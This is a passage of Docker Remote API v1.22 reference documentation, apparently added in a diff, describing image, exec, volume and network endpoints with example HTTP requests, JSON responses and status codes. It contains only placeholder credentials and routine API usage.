+ +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. + You can provide one or more `t` parameters. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. +- **buildargs** – JSON map of string pairs for build-time variables. Users pass + these values at build-time. Docker uses the `buildargs` as the environment + context for command(s) run via the Dockerfile's `RUN` instruction or for + variable expansion in other Dockerfile instructions. 
This is not meant for + passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg) +- **shmsize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.22/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. The name may include a tag or + digest. 
This parameter may only be used when pulling an image. + The pull is cancelled if the HTTP connection is closed. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. + This parameter may only be used when importing an image. +- **repo** – Repository name given to an image when it is imported. + The repo may include a tag. This parameter may only be used when importing + an image. +- **tag** – Tag or digest. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com" + } + ``` + + - Token based login: + + ``` + { + "registrytoken": "9cbaf023786cd7..." + } + ``` + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.22/images/example/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Id" : "85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c", + "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a", + "Comment" : "", + "Os" : "linux", + "Architecture" : "amd64", + "Parent" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "ContainerConfig" : { + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Domainname" : "", + "AttachStdout" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "NetworkDisabled" : false, + "OnBuild" : [], + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + 
"User" : "", + "WorkingDir" : "", + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "Labels" : { + "com.example.license" : "GPL", + "com.example.version" : "1.0", + "com.example.vendor" : "Acme" + }, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts" : null, + "Cmd" : [ + "/bin/sh", + "-c", + "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + ] + }, + "DockerVersion" : "1.9.0-dev", + "VirtualSize" : 188359297, + "Size" : 0, + "Author" : "", + "Created" : "2015-09-10T08:30:53.26995814Z", + "GraphDriver" : { + "Name" : "aufs", + "Data" : null + }, + "RepoDigests" : [ + "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags" : [ + "example:1.0", + "example:latest", + "example:stable" + ], + "Config" : { + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "NetworkDisabled" : false, + "OnBuild" : [], + "StdinOnce" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "Domainname" : "", + "AttachStdout" : false, + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Cmd" : [ + "/bin/bash" + ], + "ExposedPorts" : null, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Labels" : { + "com.example.vendor" : "Acme", + "com.example.version" : "1.0", + "com.example.license" : "GPL" + }, + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "WorkingDir" : "", + "User" : "" + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.22/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": 
"3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.22/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +The push is cancelled if the HTTP connection is closed. + +**Example request**: + + POST /v1.22/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. 
+ +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com", + } + ``` + + - Token based login: + + ``` + { + "registrytoken": "9cbaf023786cd7..." + } + ``` + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.22/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.22/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. 
+ +**Example request**: + + GET /v1.22/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.22/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.22/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Architecture": "x86_64", + "ClusterStore": "etcd://localhost:2379", + "Containers": 11, + "ContainersRunning": 7, + "ContainersStopped": 3, + "ContainersPaused": 1, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": 
"https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OSType": "linux", + "OperatingSystem": "Boot2Docker", + "Plugins": { + "Volume": [ + "local" + ], + "Network": [ + "null", + "host", + "bridge" + ] + }, + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "ServerVersion": "1.9.0", + "SwapLimit": false, + "SystemStatus": [["State", "Healthy"]], + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.22/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.10.0", + "Os": "linux", + "KernelVersion": "3.19.0-23-generic", + "GoVersion": "go1.4.2", + "GitCommit": "e75da4b", + "Arch": "amd64", + "ApiVersion": "1.22", + "BuildTime": "2015-12-01T07:09:13.444803460+00:00", + "Experimental": true + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.22/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.22/commit?container=44c004db4b17&comment=message&repo=myrepo 
HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. 
+ +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update + +Docker images report the following events: + + delete, import, pull, push, tag, untag + +Docker volumes report the following events: + + create, mount, unmount, destroy + +Docker networks report the following events: + + create, connect, disconnect, destroy + +**Example request**: + + GET /v1.22/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + Server: Docker/1.10.0 (linux) + Date: Fri, 29 Apr 2016 15:18:06 GMT + Transfer-Encoding: chunked + + { + "status": "pull", + "id": "alpine:latest", + "Type": "image", + "Action": "pull", + "Actor": { + "ID": "alpine:latest", + "Attributes": { + "name": "alpine" + } + }, + "time": 1461943101, + "timeNano": 1461943101301854122 + } + { + "status": "create", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "create", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101381709551 + } + { + "status": "attach", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "attach", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101383858412 + } + { + "Type": "network", + "Action": "connect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": 
"ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943101, + "timeNano": 1461943101394865557 + } + { + "status": "start", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "start", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101607533796 + } + { + "status": "resize", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "resize", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "height": "46", + "image": "alpine", + "name": "my-container", + "width": "204" + } + }, + "time": 1461943101, + "timeNano": 1461943101610269268 + } + { + "status": "die", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "die", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "exitCode": "0", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105079144137 + } + { + "Type": "network", + "Action": "disconnect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943105, + "timeNano": 1461943105230860245 + } + { + "status": "destroy", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": 
"alpine", + "Type": "container", + "Action": "destroy", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105338056026 + } + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + - `label=`; -- image and container label to filter + - `type=`; -- either `container` or `image` or `volume` or `network` + - `volume=`; -- volume to filter + - `network=`; -- network to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.22/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. 
+ +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.22/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.22/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. 
+ +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "DetachKeys": "ctrl-p,ctrl-q", + "Privileged": true, + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **DetachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **Privileged** - Boolean value, runs the exec process with extended privileges. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **409** - container is paused +- **500** - server error + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. 
+ +**Example request**: + + POST /v1.22/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **409** - container is paused + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.22/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. 
+ +**Example request**: + + GET /v1.22/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "CanRemove": false, + "ContainerID": "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126", + "DetachKeys": "", + "ExitCode": 2, + "ID": "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b", + "OpenStderr": true, + "OpenStdin": true, + "OpenStdout": true, + "ProcessConfig": { + "arguments": [ + "-c", + "exit 2" + ], + "entrypoint": "sh", + "privileged": false, + "tty": true, + "user": "1000" + }, + "Running": false + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +### 2.4 Volumes + +#### List volumes + +`GET /volumes` + +**Example request**: + + GET /v1.22/volumes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Volumes": [ + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + ], + "Warnings": [] + } + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. There is one available filter: `dangling=true` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a volume + +`POST /volumes/create` + +Create a volume + +**Example request**: + + POST /v1.22/volumes/create HTTP/1.1 + Content-Type: application/json + + { + "Name": "tardis" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + +**Status codes**: + +- **201** - no error +- **500** - server error + +**JSON parameters**: + +- **Name** - The new volume's name. If not specified, Docker generates a name. +- **Driver** - Name of the volume driver to use. Defaults to `local` for the name. 
+- **DriverOpts** - A mapping of driver options and values. These options are + passed directly to the driver and are driver specific. + +#### Inspect a volume + +`GET /volumes/(name)` + +Return low-level information on the volume `name` + +**Example request**: + + GET /volumes/tardis + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + +**Status codes**: + +- **200** - no error +- **404** - no such volume +- **500** - server error + +#### Remove a volume + +`DELETE /volumes/(name)` + +Instruct the driver to remove the volume (`name`). + +**Example request**: + + DELETE /v1.22/volumes/tardis HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such volume or volume driver +- **409** - volume is in use and cannot be removed +- **500** - server error + +### 2.5 Networks + +#### List networks + +`GET /networks` + +**Example request**: + + GET /v1.22/networks?filters={"type":{"custom":true}} HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + 
"com.docker.network.driver.mtu": "1500" + } + }, + { + "Name": "none", + "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794", + "Scope": "local", + "Driver": "null", + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + }, + { + "Name": "host", + "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e", + "Scope": "local", + "Driver": "host", + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + } +] +``` + +**Query parameters**: + +- **filters** - JSON encoded network list filter. The filter value is one of: + - `id=` Matches all or part of a network id. + - `name=` Matches all or part of a network name. + - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks. + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Inspect network + +`GET /networks/` + +**Example request**: + + GET /v1.22/networks/7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99 HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Name": "net01", + "Id": "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.19.0.0/16", + "Gateway": "172.19.0.1/16" + } + ], + "Options": { + "foo": "bar" + } + }, + "Containers": { + "19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c": { + "Name": "test", + "EndpointID": "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a", + "MacAddress": "02:42:ac:13:00:02", + "IPv4Address": "172.19.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + 
